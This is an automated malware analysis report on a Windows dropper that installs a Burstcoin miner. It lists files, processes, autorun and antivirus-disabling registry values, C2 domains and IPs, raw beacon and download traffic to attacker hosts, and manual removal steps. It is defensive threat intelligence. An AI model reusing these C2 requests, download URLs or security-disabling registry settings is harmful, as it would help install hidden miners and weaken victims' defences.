Gen.Variant.Symmi.22722_4840427168
Susp_Dropper (Kaspersky), Gen:Variant.Symmi.22722 (B) (Emsisoft), Gen:Variant.Symmi.22722 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 4840427168a9965e4dd57695f4eb5f34
SHA1: 0ef4dfd6895938be97f42886e003869bb777c5fd
SHA256: 8645d5705505416572d9393acca274f5d6332a3636621489d2f44ed92b290203
SSDeep: 12288:9qq56aNzthKz69e1NDxNlq99NcMWf8uqlTn8lZQTgqjFsHi0:9dppbKz6WNkLUeJ8lZQT5
Size: 847360 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: PCPerformer
Created at: 2014-04-16 00:27:00
Analyzed on: WindowsXP SP3 32-bit
Summary:
Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856
The Malware injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process jrhwdmjgunjvubg.exe:2660 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process %original file name%.exe:1144 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (0 bytes)
The process unzip.exe:3760 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
The process ckxjtyt.exe:1964 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process ckxjtyt.exe:2836 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\jrhwdmjgt1byubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (0 bytes)
The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process pogwoihcz.exe:3524 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process pogwoihcz.exe:2856 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
Registry activity
The process win32plot2.exe:1396 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process jrhwdmjgu925ubg.exe:1776 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9C E5 B6 99 02 49 CB AA D2 50 26 B3 C6 6D 3C"
The process jrhwdmjgu925ubg.exe:3876 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 52 33 C4 75 6A 43 E9 D7 74 60 B9 62 2B 23 A5"
The process jrhwdmjgunjvubg.exe:2660 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 B9 84 BF D5 1C C7 54 8E 5E 10 DE 9E 4E 24 BD"
The process unzip.exe:3760 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E4 47 D5 42 0D 90 00 56 5C 12 74 E1 87 85 4D"
The process ckxjtyt.exe:2836 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C AC 11 85 8F BF D5 2A 15 20 D5 32 A8 01 49"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 73 E8 5C DA 03 01 7E 41 DC 1A E3 19 87 2B 55"
To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"
The process jrhwdmjgt1byubg.exe:2588 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 8A 05 E4 23 AA 61 68 83 D8 98 CE C4 59 87 C7"
The process jrhwdmjgubkfubg.exe:3640 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 476f447617f65eebf35c52d4fd3b3188 | c:\WINDOWS\Temp\jrhwdmjgu925ubg.exe |
| fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 667158 | 667648 | 4.71459 | 0d37ea21d46fd457efcdcbc414af23e6 |
| .rdata | 671744 | 53434 | 53760 | 3.65008 | ebfa7ac2aa75c0bd35892129695abd28 |
| .data | 729088 | 158844 | 124928 | 5.50119 | 16d3baf792c669359cc24b48d18a27cd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://melbourneit.hotkeysparking.com/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://requireneither.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://decemberknew.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://decemberknew.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://www.geobytes.com/IpLocator.htm | |
| hxxp://decemberknew.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://decemberknew.net/forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 | |
| hxxp://decemberknew.net/dep/unzip.exe | |
| hxxp://decemberknew.net/dep/binaries_burst4.zip | |
| hxxp://throughcountry.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://gentlefriend.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://picturebecome.net/dep/binaries_burst4.zip | |
| hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://mightglossary.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| hxxp://picturebecome.net/dep/unzip.exe | |
| hxxp://glasshealth.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
| www.showmyip.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2607
Keep-Alive: timeout=5, max=126
Connection: close
Content-Type: text/html; charset=UTF-8
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:04 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
GET /forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: gentlefriend.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: requireneither.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2601
Keep-Alive: timeout=5, max=111
Connection: close
Content-Type: text/html; charset=UTF-8
relayrqst
ID..
3b93ce01..
BEGIN
GET /dep/unzip.exe HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:37 GMT
Accept-Ranges: bytes
Content-Length: 164864
Content-Type: application/octet-stream
Age: 0
Server: ATS/5.0.1
GET /dep/binaries_burst4.zip HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:06 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 06 Mar 2015 17:25:24 GMT
Accept-Ranges: bytes
Content-Length: 321783
Content-Type: application/zip
Age: 0
Server: ATS/5.0.1
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: glasshealth.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:11 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2611
Keep-Alive: timeout=5, max=127
Connection: close
Content-Type: text/html; charset=UTF-8
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: mightglossary.net
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7849
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=1671ce8f-86e8-4303-a81c-b7e9e64fca1e; path=/
Set-Cookie: VisitorID=d8fe5a56-a3a0-4e17-bb31-7f5dc4744215&Exp=3/6/2018 9:38:11 AM; expires=Tue, 06-Mar-2018 17:38:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 Mar 2015 17:38:10 GMT
Connection: close
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: throughcountry.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:38 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2741
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: ATS/5.0.1ping.5.FLAG cfg.274."soilunder.net" "longcold.net" "deepsecond.net" "s
toryocean.net" "monthnext.net" "callmile.net" "longlower.net" "faceboa
t.net" "muchhappy.net" "shallgrave.net" "nailthere.net" "fieldthan.net
" "ableread.net" "sellagain.net" "faceloud.net" "fearstate.net" "drive
thirteen.net" var_user_ip.265.Þp_host% = "picturebecome.net";.Þp_p
ath% = "/dep/";.%no_password% = "0";.%timer% = "180";.%ip% = "205.196.
221.133";.%port% = "8079";.%relay_soxid% = "8083";.%thread_timeout% =
"300";.%newport% = "31442";.%cpuinfo% = "QEMU Virtual CPU version 0.9.
1 (2327 MHz)";.plugin.67369.miner_forced.149.8hGghbvdsfSHvxnjjkJFHDGsf
4.win32plot2.exe 12754694899610736661 3b93ce01 107.155.116.121:1669,23
.92.65.20:9446,107.155.116.121:80,23.92.65.20:80 0 76.MZ..............
GET /IpLocator.htm HTTP/1.0
Accept: */*
Connection: close
Host: VVV.geobytes.com
HTTP/1.0 301 Moved Permanently
Date: Fri, 06 Mar 2015 17:39:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Set-Cookie: PHPSESSID=oiihqhdpstgi0amsp89ootkt37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /IpLocator
Content-Length: 0
Connection: close
Content-Type: text/html
The Malware connects to the servers at the following location(s):
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
%Documents and Settings%\LocalService
|%System%\pogwoihcz.exe
|decemberknew.net
WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"
%System%\ckxjtyt.exe
mscoree.dll
KERNEL32.DLL
win32plot2.exe_1396:
.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
kernel32.dll
%srecyclebin\ver1
%srecyclebin\*
%srecyclebin\%s
%srecyclebin\*_*_*_*
%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin
Adjusting total nonces to %u to match stagger size
System.PercentFull;
Registry key TileInfo changed!
Registry key PreviewDetails changed!
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
win32burst2.exe
%s %s %s %s %s
KERNEL32.dll
RegEnumKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetCPInfo
%System%\binaries_burst4\win32\win32plot2.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
win32burst2.exe_2548:
.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
ChunkSender[%d]: fuck
ChunkSender[%d]: take a break! %d
[%d] Connected to server.
kernel32.dll
recv = %s
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
%c:\recyclebin\*
%c:\recyclebin\%s
Error opening file %s
WSAStartup failed: %d
KERNEL32.dll
WS2_32.dll
GetProcessHeap
GetCPInfo
%System%\binaries_burst4\win32\win32burst2.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
@mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
jrhwdmjgunjvubg.exe_2660:
.text
`.rdata
@.data
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
%Documents and Settings%\LocalService
%WinDir%\TEMP\jrhwdmjgunjvubg.exe
mscoree.dll
KERNEL32.DLL
pogwoihcz.exe_3840:
.text
`.rdata
@.data
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
%Documents and Settings%\LocalService
%System%\pogwoihcz.exe
mscoree.dll
KERNEL32.DLL
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856
- Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\bzntcdorshxs\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.